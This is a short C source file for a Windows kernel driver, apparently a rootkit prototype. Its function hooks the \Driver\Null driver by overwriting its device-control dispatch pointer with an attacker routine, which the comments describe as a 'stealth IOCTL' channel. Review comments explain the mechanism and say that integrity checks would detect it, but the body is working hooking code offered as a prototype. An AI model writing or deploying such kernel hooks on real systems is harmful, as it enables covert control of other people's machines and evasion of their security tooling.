TODO
// Stealth IRP hook on \Driver\Null prototype
//
// HookDriverNull: looks up the \Driver\Null driver object by name and, on
// success, overwrites its IRP_MJ_DEVICE_CONTROL dispatch entry with
// HookedDeviceControl, saving the previous entry in OriginalDeviceControl.
// Both of those symbols are defined outside this listing.
//
// Parameters:
//   DriverObject - this driver's own object; it is not referenced anywhere in
//                  the body.
// Returns: the NTSTATUS from ObReferenceObjectByName; the dispatch swap is
//   performed only when that lookup succeeds.
//
// NOTE(review): ObReferenceObjectByName is not declared in the public WDK
// headers, so a prototype for it has to be supplied elsewhere in the project.
// NOTE(review): once this returns, a system driver's MajorFunction entry points
// at code outside that driver's image. That is precisely the inconsistency
// kernel integrity checks and dispatch-table audits look for, which is worth
// keeping in mind when reading the "stealth" claim above.
NTSTATUS HookDriverNull(PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING nullDriverName;
    RtlInitUnicodeString(&nullDriverName, L"\\Driver\\Null");

    // Attempt to locate target driver
    // Resolves the name against the driver-object type; on success TargetDriver
    // carries a reference that is released below with ObDereferenceObject.
    PDRIVER_OBJECT TargetDriver = NULL;
    NTSTATUS status = ObReferenceObjectByName(&nullDriverName, OBJ_CASE_INSENSITIVE, NULL, 0,
                                              *IoDriverObjectType, KernelMode, NULL,
                                              (PVOID*)&TargetDriver);
    if (NT_SUCCESS(status)) {
        // Swap major function pointer for stealth IOCTL
        // Save the current dispatch routine into the global OriginalDeviceControl
        // (defined elsewhere) and install HookedDeviceControl in its place.
        OriginalDeviceControl = TargetDriver->MajorFunction[IRP_MJ_DEVICE_CONTROL];
        TargetDriver->MajorFunction[IRP_MJ_DEVICE_CONTROL] = HookedDeviceControl;
        // Release only the lookup reference; nothing here restores the entry.
        ObDereferenceObject(TargetDriver);
    }
    return status;
}
// TODO: Need to handle MmGetPhysicalAddress transition to avoid page faults